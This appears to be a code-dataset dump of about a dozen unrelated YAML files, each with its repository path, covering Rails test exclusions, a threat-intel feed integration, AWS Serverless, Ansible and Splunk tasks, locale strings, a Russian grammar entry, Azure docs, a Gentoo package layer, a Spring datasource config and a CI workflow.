code
stringlengths 38
801k
| repo_path
stringlengths 6
263
|
|---|---|
---
PathGenerationTest:
- test_original_script_name
Rails::TestInfoTest:
- test_with_file
- test_with_opts
Rails::DBConsoleTest:
- test_sqlite3_db_without_defined_rails_root
ActionsTest:
- test_environment_should_include_data_in_environment_initializer_block_with_env_option
AppGeneratorTest:
- test_application_name_is_detected_if_it_exists_and_app_folder_renamed
- test_application_name_with_spaces
- test_application_new_exits_with_message_and_non_zero_code_when_generating_inside_existing_rails_directory
- test_application_new_show_help_message_inside_existing_rails_directory
- test_assets
- test_generator_if_skip_sprockets_is_given
- test_generator_if_skip_turbolinks_is_given
- test_gitignore_when_sqlite3
- test_javascript_is_skipped_if_required
- test_jquery_is_the_default_javascript_library
- test_new_hash_style
- test_other_javascript_libraries
- test_rails_update_generates_correct_session_key
- test_spring
- test_template_is_executed_when_supplied
- test_template_is_executed_when_supplied_an_https_path
- test_web_console
GeneratorGeneratorTest:
- test_generator_skeleton_is_created
- test_generator_skeleton_is_created_without_file_name_namespace
- test_namespaced_generator_skeleton
- test_namespaced_generator_skeleton_without_file_name_namespace
Rails::Generators::GeneratorTest:
- test_filter
- test_two_filters
NamespacedScaffoldGeneratorTest:
- test_scaffold_with_namespace_on_invoke
- test_scaffold_with_namespace_on_revoke
- test_scaffold_with_nested_namespace_on_invoke
- test_scaffold_with_nested_namespace_on_revoke
OrmTest:
- test_orm_instance_returns_orm_class_instance_with_name
PluginGeneratorTest:
- test_create_mountable_application_with_mountable_option
- test_creating_engine_in_full_mode
- test_ensure_that_migration_tasks_work_with_mountable_option
- test_ensure_that_tests_work
- test_ensure_that_tests_works_in_full_mode
- test_generating_controller_inside_mountable_engine
- test_generation_runs_bundle_install_with_full_and_mountable
- test_shebang
- test_shebang_is_added_to_rails_file
- test_shebang_when_is_the_same_as_default_use_env
- test_template_is_executed_when_supplied
- test_template_is_executed_when_supplied_an_https_path
- test_usage_of_engine_commands
ResourceGeneratorTest:
- test_files_from_inherited_invocation
- test_inherited_invocations_with_attributes
- test_plural_names_are_singularized
- test_plural_names_can_be_forced
- test_resource_controller_with_actions
- test_resource_controller_with_pluralized_class_name
ScaffoldControllerGeneratorTest:
- test_controller_permit_polymorphic_references_attributes
- test_controller_permit_references_attributes
- test_controller_skeleton_is_created
- test_controller_tests_pass_by_default_inside_full_engine
- test_controller_tests_pass_by_default_inside_mountable_engine
- test_customized_orm_is_used
- test_default_orm_is_used
- test_dont_use_require_or_permit_if_there_are_no_attributes
- test_functional_tests
- test_functional_tests_without_attributes
- test_helper_are_invoked_with_a_pluralized_name
- test_index_page_have_notice
- test_views_are_generated
ScaffoldGeneratorTest:
- test_functional_tests_without_attributes
- test_scaffold_generator_belongs_to
- test_scaffold_generator_no_javascripts
- test_scaffold_generator_no_stylesheets
- test_scaffold_generator_outputs_error_message_on_missing_attribute_type
- test_scaffold_generator_password_digest
- test_scaffold_on_invoke
- test_scaffold_tests_pass_by_default_inside_full_engine
- test_scaffold_tests_pass_by_default_inside_mountable_engine
- test_scaffold_with_namespace_on_invoke
- test_scaffold_with_namespace_on_revoke
GeneratorsTest:
- test_rails_root_templates
|
lib/ruby/truffle/jruby-truffle-tool/lib/truffle/railties_exclusions.yaml
|
category: Data Enrichment & Threat Intelligence
commonfields:
id: JSON Feed
version: -1
configuration:
- display: Fetch indicators
name: feed
defaultvalue: true
type: 8
required: false
- display: Indicator Reputation
name: feedReputation
defaultvalue: feedInstanceReputationNotSet
type: 18
required: false
options:
- None
- Good
- Suspicious
- Bad
additionalinfo: Indicators from this integration instance will be marked with this reputation
- defaultvalue: F - Reliability cannot be judged
display: Source Reliability
name: feedReliability
options:
- A - Completely reliable
- B - Usually reliable
- C - Fairly reliable
- D - Not usually reliable
- E - Unreliable
- F - Reliability cannot be judged
required: true
type: 15
additionalinfo: Reliability of the source providing the intelligence data
- display: ""
name: feedExpirationPolicy
defaultvalue: indicatorType
type: 17
required: false
options:
- never
- interval
- indicatorType
- suddenDeath
- name: feedExpirationInterval
defaultvalue: "20160"
required: false
type: 1
display: ""
- defaultvalue: '240'
display: Feed Fetch Interval
name: feedFetchInterval
required: false
type: 19
- display: URL
name: url
required: true
type: 0
- display: Auto detect indicator type
name: auto_detect_type
required: false
type: 8
defaultvalue: true
additionalinfo: If selected, the indicator type will be auto detected for each indicator.
- additionalinfo: Type of the indicator in the feed. Relevant only if auto detect is not selected.
display: Indicator Type
name: indicator_type
required: false
type: 0
- display: Username
name: credentials
required: false
type: 9
- additionalinfo: JMESPath expression for extracting the indicators. You can use http://jmespath.org/ to identify the proper expression.
display: JMESPath Extractor
name: extractor
required: true
type: 0
- additionalinfo: The JSON attribute that holds the indicator value. Default value is 'indicator'.
display: JSON Indicator Attribute
name: indicator
required: false
type: 0
- display: Trust any certificate (not secure)
name: insecure
required: false
type: 8
- display: Use system proxy settings
name: proxy
required: false
type: 8
- display: Bypass exclusion list
name: feedBypassExclusionList
defaultvalue: ""
type: 8
required: false
additionalinfo:
When selected, the exclusion list is ignored for indicators from this feed.
This means that if an indicator from this feed is on the exclusion list,
the indicator might still be added to the system.
description: Fetches indicators from a JSON feed.
display: JSON Feed
name: JSON Feed
script:
commands:
- arguments:
- default: false
defaultValue: '50'
description: The maximum number of results to return. The default value is 50.
isArray: false
name: limit
required: false
secret: false
deprecated: false
description: Gets the feed indicators.
execution: false
name: json-get-indicators
feed: true
runonce: false
script: '-'
type: python
subtype: python3
dockerimage: demisto/jmespath:1.0.0.6980
fromversion: 5.5.0
tests:
- JSON_Feed_Test
|
Packs/FeedJSON/Integrations/FeedJSON/FeedJSON.yml
|
service: eta-report # NOTE: update this with your service name
# You can pin your service to only deploy with a specific Serverless version
# Check out our docs for more details
# frameworkVersion: "=X.X.X"
frameworkVersion: ">=1.28.0 <2.0.0"
provider:
name: aws
runtime: go1.x
# you can overwrite defaults here
# stage: dev
region: us-west-2
# you can add statements to the Lambda function's IAM Role here
iamRoleStatements:
- Effect: "Allow"
Action:
- "s3:ListBucket"
# You can put CloudFormation syntax in here. No one will judge you.
# Remember, this all gets translated to CloudFormation.
Resource:
Fn::Join:
- ""
- - "arn:aws:s3:::"
- ${file(common.env.yml):s3_bucket}
- Effect: "Allow"
Action:
- "s3:PutObject"
Resource:
Fn::Join:
- ""
- - "arn:aws:s3:::"
- ${file(common.env.yml):s3_bucket}
- "/*"
- Effect: "Allow"
Action:
- "s3:PutObjectAcl"
Resource:
Fn::Join:
- ""
- - "arn:aws:s3:::"
- ${file(common.env.yml):s3_bucket}
- "/*"
# you can define service wide environment variables here
environment:
mysql_db_con: ${file(mysql.env.yml):db_con}
orders_db_con: ${file(orders/orders.env.yml):db_con}
orders_db_name: ${file(orders/orders.env.yml):db_name}
orders_orders_collection: ${file(orders/orders.env.yml):orders_collection}
events_db_con: ${file(events/events.env.yml):db_con}
events_db_name: ${file(events/events.env.yml):db_name}
events_events_collection: ${file(events/events.env.yml):events_collection}
s3_environment: ${file(common.env.yml):s3_environment}
s3_bucket: ${file(common.env.yml):s3_bucket}
s3_dir: ${file(common.env.yml):s3_dir}
package:
exclude:
- ./**
include:
- ./bin/**
functions:
calc:
handler: bin/calc
events:
- http:
path: calc
method: get
orders:
handler: bin/orders
timeout: 20
events:
- http:
path: orders
method: get
events:
handler: bin/events
timeout: 20
events:
- http:
path: events
method: get
logs:
handler: bin/logs
timeout: 20
events:
- http:
path: logs
method: get
# The following are a few example events you can configure
# NOTE: Please make sure to change your handler code to work with those events
# Check the event documentation for details
# events:
# events:
# - http:
# path: users/create
# method: get
# - s3: ${env:BUCKET}
# - schedule: rate(10 minutes)
# - sns: greeter-topic
# - stream: arn:aws:dynamodb:region:XXXXXX:table/foo/stream/1970-01-01T00:00:00.000
# - alexaSkill: amzn1.ask.skill.xx-xx-xx-xx
# - alexaSmartHome: amzn1.ask.skill.xx-xx-xx-xx
# - iot:
# sql: "SELECT * FROM 'some_topic'"
# - cloudwatchEvent:
# event:
# source:
# - "aws.ec2"
# detail-type:
# - "EC2 Instance State-change Notification"
# detail:
# state:
# - pending
# - cloudwatchLog: '/aws/lambda/hello'
# - cognitoUserPool:
# pool: MyUserPool
# trigger: PreSignUp
# Define function environment variables here
# environment:
# variable2: value2
# you can add CloudFormation resource templates here
#resources:
# Resources:
# NewResource:
# Type: AWS::S3::Bucket
# Properties:
# BucketName: my-new-bucket
# Outputs:
# NewOutput:
# Description: "Description for the output"
# Value: "Some output value"
|
Lambda/serverless-golang/eta-report/serverless.yml
|
---
- name: "ensure the namespace is removed"
import_role:
name: "common/namespace/clean"
vars:
namespace: "{{ tanzu_logging.namespace }}"
- name: "ensure the custom resource definitions are removed"
k8s:
state: "absent"
context: "{{ tanzu_kubectl_context }}"
kind: "CustomResourceDefinition"
name: "{{ item }}"
register: crd_clean_status
until: not crd_clean_status.failed
retries: 30
delay: 1
with_items:
- "apmservers.apm.k8s.elastic.co"
- "kibanas.kibana.k8s.elastic.co"
- "elasticsearches.elasticsearch.k8s.elastic.co"
- "beats.beat.k8s.elastic.co"
- "enterprisesearches.enterprisesearch.k8s.elastic.co"
- name: "ensure the api services are removed"
k8s:
state: "absent"
context: "{{ tanzu_kubectl_context }}"
kind: "APIService"
name: "{{ item }}"
register: api_clean_status
until: not api_clean_status.failed
retries: 30
delay: 1
with_items:
- "v1beta1.apm.k8s.elastic.co"
- "v1beta1.elasticsearch.k8s.elastic.co"
- "v1beta1.kibana.k8s.elastic.co"
- "v1.apm.k8s.elastic.co"
- "v1.elasticsearch.k8s.elastic.co"
- "v1.kibana.k8s.elastic.co"
- name: "ensure the pod security policy is removed"
k8s:
state: "absent"
context: "{{ tanzu_kubectl_context }}"
kind: "PodSecurityPolicy"
name: "{{ item }}"
api_version: "policy/v1beta1"
with_items:
- "elasticsearch-psp"
- "fluent-bit-psp"
- name: "ensure the cluster-wide rbac resources are removed"
k8s:
state: "absent"
context: "{{ tanzu_kubectl_context }}"
kind: "{{ item.kind }}"
name: "{{ item.name }}"
with_items:
- name: "elastic-operator-view"
kind: "ClusterRole"
- name: "elastic-operator-edit"
kind: "ClusterRole"
- name: "elastic-operator"
kind: "ClusterRole"
- name: "fluent-bit-read"
kind: "ClusterRole"
- name: "elasticsearch-psp"
kind: "ClusterRole"
- name: "fluent-bit-psp"
kind: "ClusterRole"
- name: "elastic-operator"
kind: "ClusterRoleBinding"
- name: "fluent-bit-read"
kind: "ClusterRoleBinding"
- name: "elastic-operator"
kind: "ClusterRoleBinding"
- name: "fluent-bit-read"
kind: "ClusterRoleBinding"
- name: "elasticsearch-psp"
kind: "ClusterRoleBinding"
- name: "fluent-bit-psp"
kind: "ClusterRoleBinding"
|
roles/components/core/logging/clean/tasks/main.yaml
|
sv:
admin:
actions:
bulk_delete:
breadcrumb: Radera alla
bulk_link: Radera markerade %{model_label_plural}
menu: Radera alla
title: Radera %{model_label_plural}
dashboard:
breadcrumb: "Översikt"
menu: "Översikt"
title: Administrera sidan
delete:
breadcrumb: Radera
done: raderad
link: Radera '%{object_label}'
menu: Radera
title: Radera %{model_label} '%{object_label}'
edit:
breadcrumb: Redigera
done: uppdaterad
link: Redigera %{model_label}
menu: Redigera
title: Redigera %{model_label} '%{object_label}'
export:
breadcrumb: Exportera
bulk_link: Exportera markerade %{model_label_plural}
done: exporterad
link: Exportera hittade %{model_label_plural}
menu: Exportera
title: Exportera %{model_label_plural}
history_index:
breadcrumb: Historia
menu: Historia
title: Historia för %{model_label_plural}
history_show:
breadcrumb: Historia
menu: Historia
title: Historia för %{model_label} '%{object_label}'
index:
breadcrumb: "%{model_label_plural}"
menu: Lista
title: Lista över %{model_label_plural}
new:
breadcrumb: Ny
done: skapad
link: Skapa %{model_label}
menu: Skapa ny
title: Skapa %{model_label}
show:
breadcrumb: "%{object_label}"
menu: Visa
title: Detaljer för %{model_label} '%{object_label}'
show_in_app:
menu: Visa i applikationen
export:
click_to_reverse_selection: Klicka föra att ta bort urvalet
confirmation: Exportera till %{name}
csv:
col_sep: Kolumn separator
col_sep_help: Lämna tom för default ('%{value}')
default_col_sep: ","
encoding_to: Encodera till
encoding_to_help:
header_for_association_methods: "%{name} [%{association}]"
header_for_root_methods: "%{name}"
skip_header:
skip_header_help:
display: 'Visa %{name}: %{type}'
empty_value_for_associated_objects: "<tom>"
fields_from: Kolumner från %{name}
fields_from_associated:
options_for: Inställningar för %{name}
select: Välj kolumner att exportera
flash:
error: "%{name} lyckades inte att %{action}"
model_not_found: Kan inte hitta modellen '%{model}'
noaction: Inga ändringar har skett
object_not_found: Hittade inte %{model} med id '%{id}'
successful:
form:
all_of_the_following_related_items_will_be_deleted:
are_you_sure_you_want_to_delete_the_object:
basic_info: Generell information
bulk_delete:
cancel: Avbryt
char_length_of: längden av
char_length_up_to:
confirmation: Ja, jag är säker
new_model: Ny
one_char: tecken
optional: Valfri
required: Krävs
save: Spara
save_and_add_another: Spara och skapa fler
save_and_edit: Spara och fortsätt redigera
misc:
add_filter:
add_new:
ago:
bulk_menu_title:
chose_all:
chosen:
clear_all:
down:
filter:
filter_date_format:
log_out:
navigation:
refresh:
remove:
search:
show_all:
up:
table_headers:
changes:
created_at:
item:
last_used:
message:
model_name:
records:
username:
home:
name: Hem
pagination:
next: Nästa »
previous: "« Föregående"
truncate: "..."
|
locales/sv.yml
|
---
# This playbook install the base config app
- name: "({{ app_name }}) setting clustering master_uri"
tags:
- splunk
- splunk_baseconfig
- org_cluster_search_base
ini_file:
path: "{{ app_path }}/{{ app_dest_name }}/local/server.conf"
section: clustering
option: master_uri
value: "{% set comma = joiner(',') %}{% for peer in splunk_search_peer_idxc_list %}{{ comma() }}clustermaster:{{ peer }}{% endfor %}"
owner: "{{splunk_user}}"
group: "{{splunk_group}}"
mode: 0600
notify: restart splunk
when: splunk_search_peer_idxc_list|length > 0
- name: "({{ app_name }}) rename clustermaster:one"
tags:
- splunk
- splunk_baseconfig
- org_cluster_search_base
replace:
path: "{{ app_path }}/{{ app_dest_name }}/local/server.conf"
regexp: '\[clustermaster:one\]'
replace: "[clustermaster:{{ splunk_search_peer_idxc_list|first }}]"
owner: "{{splunk_user}}"
group: "{{splunk_group}}"
mode: 0600
notify: restart splunk
- name: "({{ app_name }}) remove clustermaster:two cluster master group"
tags:
- splunk
- splunk_baseconfig
- org_cluster_search_base
ini_file:
path: "{{ app_path }}/{{ app_dest_name }}/local/server.conf"
section: clustermaster:two
state: absent
owner: "{{splunk_user}}"
group: "{{splunk_group}}"
mode: 0600
notify: restart splunk
- name: "({{ app_name }}) setting pass4SymmKey for hashing on clustermaster stanza"
tags:
- splunk
- splunk_baseconfig
- org_cluster_search_base
ini_file:
path: "{{ app_path }}/{{ app_dest_name }}/local/server.conf"
section: clustermaster:{{ item.key }}
option: pass4SymmKey
value: "{{ hostvars[item.value]['idxc_password'] }}"
owner: "{{splunk_user}}"
group: "{{splunk_group}}"
mode: 0600
notify: restart splunk
with_dict: "{{ splunk_search_peer_idxc_list }}"
when: app_local.stat.exists == false and app_path == splunk_home + '/etc/apps'
- name: "({{ app_name }}) setting static unhashed pass4SymmKey on clustermaster stanza"
tags:
- splunk
- splunk_baseconfig
- org_cluster_search_base
ini_file:
path: "{{ app_path }}/{{ app_dest_name }}/local/server.conf"
section: clustermaster:{{ item.key }}
option: pass4SymmKey
value: "{{ hostvars[item.value]['idxc_password'] }}"
owner: "{{splunk_user}}"
group: "{{splunk_group}}"
mode: 0600
notify: restart splunk
with_dict: "{{ splunk_search_peer_idxc_list }}"
when: app_path != splunk_home + '/etc/apps'
- name: "({{ app_name }}) setting master_uri in clustermaster stanza"
tags:
- splunk
- splunk_baseconfig
- org_cluster_search_base
ini_file:
path: "{{ app_path }}/{{ app_dest_name }}/local/server.conf"
section: clustermaster:{{ item.key }}
option: master_uri
value: "https://{{ item.value }}:8089"
owner: "{{splunk_user}}"
group: "{{splunk_group}}"
mode: 0600
notify: restart splunk
with_dict: "{{ splunk_search_peer_idxc_list }}"
- name: "({{ app_name }}) setting multisite on clustermaster stanza"
tags:
- splunk
- splunk_baseconfig
- org_cluster_search_base
ini_file:
path: "{{ app_path }}/{{ app_dest_name }}/local/server.conf"
section: clustermaster:{{ item.key }}
option: multisite
value: "{% if hostvars[item.value]['idxc_available_sites']|default([])|length > 0 %}true{% else %}false{% endif %}"
owner: "{{splunk_user}}"
group: "{{splunk_group}}"
mode: 0600
notify: restart splunk
with_dict: "{{ splunk_search_peer_idxc_list }}"
- name: "({{ app_name }}) setting site"
tags:
- splunk
- splunk_baseconfig
- org_cluster_search_base
ini_file:
path: "{{ app_path }}/{{ app_dest_name }}/local/server.conf"
section: general
option: site
value: "{{splunk_shc_site}}"
owner: "{{splunk_user}}"
group: "{{splunk_group}}"
mode: 0600
notify: restart splunk
when: splunk_shc_site is defined
|
ansible/roles/baseconfig_app/tasks/org_cluster_search_base.yml
|
---
record: 271
name: 'VP под видом NP-Gen'
UD_name: 'VP под видом NP-Gen'
illustration: 'Она приехала в город под видом туриста.'
cefr_level: B1
definitions:
- russian: |
Конструкция обозначает, что [некоторый объект]Theme или [действие]Activity намеренно выдается за [нечто иное]Status (примеры 1, 4) или [участник]Agent выдает себя за [другое лицо]Status при совершении определенного [действия]Action (примеры 2, 3). Конструкция также может использоваться при указании на [вымышленный предлог или внешний повод]Cause какого-либо [действия]Action (пример 5).
- norwegian: |
Konstruksjonen betyr at [et gitt objekt]Theme eller [en gitt handling]Activity bevisst gir seg ut for å være [noe annet]Status (eksempel 1 og 4) eller at [en deltaker]Agent under utførelsen av en gitt [handling]Action gir seg ut for å være [en annen person]Status (eksempel 2 og 3). Konstruksjonen kan også brukes for å vise til [et oppdiktet påskudd eller en ytre foranledning]Cause til en eller annen [handling]Action (eksempel 5).
examples:
- |
Вам не приносили [фальшивки]Theme под видом [второго тома]Status?
- |
Именно [вампиры]Agent когда-то [открыто управляли людьми]Action под видом [эллинских и прочих богов]Status.
- |
В 2007 году по инициативе газеты The Washington Post в течение 45 минут [он]Agent [играл в вестибюле станции метро]Action под видом [уличного музыканта]Status, при этом заработав 32 доллара.
- |
У нас же пока предлагался только социальный патронат как [контроль]Activity под видом [помощи]Status.
- |
Под видом [командировки]Cause он мог [послать в наш город двух-трёх деловых людей]Action, они бы всё досконально узнали.
morphology:
- VP
- NP
- Gen
syntactic_type_of_construction:
- Head and Modifier Construction
syntactic_function_of_anchor:
- Modifier
syntactic_structure_of_anchor:
- Nominal Pattern
part_of_speech_of_anchor:
- Preposition
- Noun
semantic_roles:
- Theme
- Action
- Agent
- Activity
- Cause
- Status
intonation:
- Not applicable
usage_label: ~
dependency_structure:
- '[root VP [obl [case под] видом [nmod NP-Gen]]]'
dependency_structure_of_illustration:
- '[root [nsubj Она] приехала [obl [case в] город] [obl [case под] видом [nmod туриста]].]'
comment: |
'No comment yet'
common_fillers:
- Not applicable
references:
- |
No references
semantic_types:
- type: Comparison
subtypes:
- type: Imitation
family:
- |
""
|
data/0271.yml
|
items:
- uid: '@azure/arm-sqlvirtualmachine.StorageConfigurationSettings'
name: StorageConfigurationSettings
fullName: StorageConfigurationSettings
children:
- >-
@azure/arm-sqlvirtualmachine.StorageConfigurationSettings.diskConfigurationType
- >-
@azure/arm-sqlvirtualmachine.StorageConfigurationSettings.sqlDataSettings
- '@azure/arm-sqlvirtualmachine.StorageConfigurationSettings.sqlLogSettings'
- >-
@azure/arm-sqlvirtualmachine.StorageConfigurationSettings.sqlTempDbSettings
- >-
@azure/arm-sqlvirtualmachine.StorageConfigurationSettings.storageWorkloadType
langs:
- typeScript
type: interface
summary: 'Storage Configurations for SQL Data, Log and TempDb.'
package: '@azure/arm-sqlvirtualmachine'
- uid: >-
@azure/arm-sqlvirtualmachine.StorageConfigurationSettings.diskConfigurationType
name: diskConfigurationType
fullName: diskConfigurationType
children: []
langs:
- typeScript
type: property
summary: >-
Disk configuration to apply to SQL Server. Possible values include: 'NEW',
'EXTEND', 'ADD'
optional: true
syntax:
content: 'diskConfigurationType?: DiskConfigurationType'
return:
type:
- '@azure/arm-sqlvirtualmachine.DiskConfigurationType'
description: ''
package: '@azure/arm-sqlvirtualmachine'
- uid: '@azure/arm-sqlvirtualmachine.StorageConfigurationSettings.sqlDataSettings'
name: sqlDataSettings
fullName: sqlDataSettings
children: []
langs:
- typeScript
type: property
summary: SQL Server Data Storage Settings.
optional: true
syntax:
content: 'sqlDataSettings?: SQLStorageSettings'
return:
type:
- '@azure/arm-sqlvirtualmachine.SQLStorageSettings'
description: ''
package: '@azure/arm-sqlvirtualmachine'
- uid: '@azure/arm-sqlvirtualmachine.StorageConfigurationSettings.sqlLogSettings'
name: sqlLogSettings
fullName: sqlLogSettings
children: []
langs:
- typeScript
type: property
summary: SQL Server Log Storage Settings.
optional: true
syntax:
content: 'sqlLogSettings?: SQLStorageSettings'
return:
type:
- '@azure/arm-sqlvirtualmachine.SQLStorageSettings'
description: ''
package: '@azure/arm-sqlvirtualmachine'
- uid: >-
@azure/arm-sqlvirtualmachine.StorageConfigurationSettings.sqlTempDbSettings
name: sqlTempDbSettings
fullName: sqlTempDbSettings
children: []
langs:
- typeScript
type: property
summary: SQL Server TempDb Storage Settings.
optional: true
syntax:
content: 'sqlTempDbSettings?: SQLStorageSettings'
return:
type:
- '@azure/arm-sqlvirtualmachine.SQLStorageSettings'
description: ''
package: '@azure/arm-sqlvirtualmachine'
- uid: >-
@azure/arm-sqlvirtualmachine.StorageConfigurationSettings.storageWorkloadType
name: storageWorkloadType
fullName: storageWorkloadType
children: []
langs:
- typeScript
type: property
summary: 'Storage workload type. Possible values include: ''GENERAL'', ''OLTP'', ''DW'''
optional: true
syntax:
content: 'storageWorkloadType?: StorageWorkloadType'
return:
type:
- '@azure/arm-sqlvirtualmachine.StorageWorkloadType'
description: ''
package: '@azure/arm-sqlvirtualmachine'
references:
- uid: '@azure/arm-sqlvirtualmachine.DiskConfigurationType'
name: DiskConfigurationType
spec.typeScript:
- name: DiskConfigurationType
fullName: DiskConfigurationType
uid: '@azure/arm-sqlvirtualmachine.DiskConfigurationType'
- uid: '@azure/arm-sqlvirtualmachine.SQLStorageSettings'
name: SQLStorageSettings
spec.typeScript:
- name: SQLStorageSettings
fullName: SQLStorageSettings
uid: '@azure/arm-sqlvirtualmachine.SQLStorageSettings'
- uid: '@azure/arm-sqlvirtualmachine.StorageWorkloadType'
name: StorageWorkloadType
spec.typeScript:
- name: StorageWorkloadType
fullName: StorageWorkloadType
uid: '@azure/arm-sqlvirtualmachine.StorageWorkloadType'
|
docs-ref-autogen/@azure/arm-sqlvirtualmachine/StorageConfigurationSettings.yml
|
category: "layers"
name: "codecs"
version: 2+27
labels:
emerge.jobs: "1"
emerge.packages: >-
app-i18n/uchardet app-text/iso-codes dev-libs/libcdio dev-libs/libcdio-paranoia media-sound/gsm media-sound/lame media-sound/musepack-tools media-libs/a52dec media-libs/aalib media-libs/alsa-lib media-libs/alsa-topology-conf media-libs/alsa-ucm-conf media-libs/dav1d media-libs/fdk-aac media-libs/flac media-libs/libcddb media-libs/libdvdread media-libs/libdvdnav media-libs/libdvbpsi media-libs/libid3tag media-libs/libmatroska media-libs/libmodplug media-libs/libcue media-libs/libsamplerate media-libs/libtheora media-libs/libogg media-libs/libvorbis media-libs/opus media-libs/shaderc media-libs/soxr media-libs/vidstab media-libs/woff2 media-libs/x264 media-libs/x265 media-libs/xvid media-plugins/live media-sound/wavpack
provides:
- name: brotli
category: app-arch
version: '>=0'
- name: eselect-cdparanoia
category: app-eselect
version: '>=0'
- name: uchardet
category: app-i18n
version: '>=0'
- name: iso-codes
category: app-text
version: '>=0'
- name: nasm
category: dev-lang
version: '>=0'
- name: libcdio
category: dev-libs
version: '>=0'
- name: libcdio-paranoia
category: dev-libs
version: '>=0'
- name: libebml
category: dev-libs
version: '>=0'
- name: glslang
category: dev-util
version: '>=0'
- name: spirv-headers
category: dev-util
version: '>=0'
- name: spirv-tools
category: dev-util
version: '>=0'
- name: a52dec
category: media-libs
version: '>=0'
- name: aalib
category: media-libs
version: '>=0'
- name: alsa-lib
category: media-libs
version: '>=0'
- name: alsa-topology-conf
category: media-libs
version: '>=0'
- name: alsa-ucm-conf
category: media-libs
version: '>=0'
- name: dav1d
category: media-libs
version: '>=0'
- name: fdk-aac
category: media-libs
version: '>=0'
- name: flac
category: media-libs
version: '>=0'
- name: libcddb
category: media-libs
version: '>=0'
- name: libcue
category: media-libs
version: '>=0'
- name: libcuefile
category: media-libs
version: '>=0'
- name: libdvbpsi
category: media-libs
version: '>=0'
- name: libdvdnav
category: media-libs
version: '>=0'
- name: libdvdread
category: media-libs
version: '>=0'
- name: libid3tag
category: media-libs
version: '>=0'
- name: libmatroska
category: media-libs
version: '>=0'
- name: libmodplug
category: media-libs
version: '>=0'
- name: libogg
category: media-libs
version: '>=0'
- name: libreplaygain
category: media-libs
version: '>=0'
- name: libsamplerate
category: media-libs
version: '>=0'
- name: libtheora
category: media-libs
version: '>=0'
- name: libvorbis
category: media-libs
version: '>=0'
- name: opus
category: media-libs
version: '>=0'
- name: shaderc
category: media-libs
version: '>=0'
- name: soxr
category: media-libs
version: '>=0'
- name: vidstab
category: media-libs
version: '>=0'
- name: woff2
category: media-libs
version: '>=0'
- name: x264
category: media-libs
version: '>=0'
- name: x265
category: media-libs
version: '>=0'
- name: xvid
category: media-libs
version: '>=0'
- name: live
category: media-plugins
version: '>=0'
- name: gsm
category: media-sound
version: '>=0'
- name: lame
category: media-sound
version: '>=0'
- name: musepack-tools
category: media-sound
version: '>=0'
- name: wavpack
category: media-sound
version: '>=0'
|
packages/layers/codecs/definition.yaml
|
logging:
level:
com.mldong: DEBUG
org.springframework: DEBUG
tk.mybatis: DEBUG
tk.ibatis: DEBUG
tk.ibatis.common.jdbc.SimpleDataSource: DEBUG
tk.ibatis.common.jdbc.ScriptRunner: DEBUG
tk.ibatis.sqlmap.engine.impl.SqlMapClientDelegate: DEBUG
java.sql.Connection: DEBUG
java.sql.Statement: DEBUG
java.sql.PreparedStatement: DEBUG
org.springframework.scheduling: INFO
org.springframework.jdbc.core: DEBUG
server:
port: 8888
spring:
application:
name: mldong-data-service
profiles:
active: dev
jackson:
default-property-inclusion: non_null
time-zone: GMT+8
date-format: yyyy-MM-dd HH:mm:ss
datasource:
type: com.alibaba.druid.pool.DruidDataSource
druid:
driver-class-name: com.mysql.cj.jdbc.Driver
url: jdbc:mysql://192.168.1.160:3306/mldong?useUnicode=true&characterEncoding=UTF-8&allowMultiQueries=true&useSSL=false&serverTimezone=Asia/Shanghai
username: root
password: <PASSWORD>
# 初始化时建立物理连接的个数
initial-size: 3
# 最大连接池数量
max-active: 10
# 最小连接池数量
min-idle: 3
# 获取连接时最大等待时间
max-wait: 10000
# 是否缓存preparedStatement,也就是PSCache。
pool-prepared-statements: false
# 要启用PSCache,必须配置大于0,当大于0时,poolPreparedStatements自动触发修改为true。
max-pool-prepared-statement-per-connection-size: -1
# 用来检测连接是否有效的sql,要求是一个查询语句,常用select 'x'。
validation-query: SELECT 'x'
# 单位:秒,检测连接是否有效的超时时间。
validation-query-timeout: 1
# 申请连接时执行validationQuery检测连接是否有效,做了这个配置会降低性能。
test-on-borrow: false
# 归还连接时执行validationQuery检测连接是否有效,做了这个配置会降低性能。
test-on-return: false
# 建议配置为true,不影响性能,并且保证安全性。申请连接的时候检测,如果空闲时间大于timeBetweenEvictionRunsMillis,执行validationQuery检测连接是否有效。
test-while-idle: true
# 有两个含义:1) Destroy线程会检测连接的间隔时间,如果连接空闲时间大于等于minEvictableIdleTimeMillis则关闭物理连接。2) testWhileIdle的判断依据,详细看testWhileIdle属性的说明
time-between-eviction-runs-millis: 6000
# 连接保持空闲而不被驱逐的最小时间
min-evictable-idle-time-millis: 1800000
# spring监控页面的配置
aop-patterns:
- com.mldong.modules.*.service.*
# 监控页面相关配置
stat-view-servlet:
enable: true
url-pattern: /druid/*
login-username: admin
login-password: <PASSWORD>
# filter相关配置
filter:
stat:
slow-sql-millis: 1000
log-slow-sql: true
enabled: true
ds:
stmsdb:
open: true
driver-class-name: com.mysql.cj.jdbc.Driver
url: jdbc:mysql://192.168.1.160:3306/stmsdb?useUnicode=true&characterEncoding=UTF-8&allowMultiQueries=true&useSSL=false&serverTimezone=Asia/Shanghai
username: root
password: <PASSWORD>
|
mldong-data-service/src/main/resources/application.yml
|
name: Main
on:
push:
branches:
- main
jobs:
commit-lint:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Commit Lint
uses: wagoid/commitlint-github-action@v4
code-lint:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Setup Node.js environment
uses: actions/setup-node@v2.5.1
with:
node-version: '16'
- uses: actions/cache@v2
with:
path: '**/node_modules'
key: ${{ runner.os }}-node-16-modules-${{ hashFiles('**/yarn.lock') }}
- name: Install dependencies
run: yarn install --frozen-lockfile
- name: Format
run: yarn run format
- name: Lint
run: yarn run lint
test-with-node:
runs-on: ubuntu-latest
strategy:
matrix:
node-version: [ 12, 14, 15, 16 ]
steps:
- uses: actions/checkout@v2
- name: Setup Node.js environment
uses: actions/setup-node@v2.5.1
with:
node-version: ${{ matrix.node-version }}
- uses: actions/cache@v2
with:
path: '**/node_modules'
key: ${{ runner.os }}-node-${{ matrix.node-version }}-modules-${{ hashFiles('**/yarn.lock') }}
- name: Install dependencies
run: yarn install --frozen-lockfile --ignore-engines
- name: Run Tests with coverage
run: yarn test:coverage
- name: Post coverage results to coveralls
uses: coverallsapp/github-action@master
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
flag-name: run-with-node-version-${{ matrix.node-version }}
parallel: true
complete-coverage-results:
needs: test-with-node
runs-on: ubuntu-latest
steps:
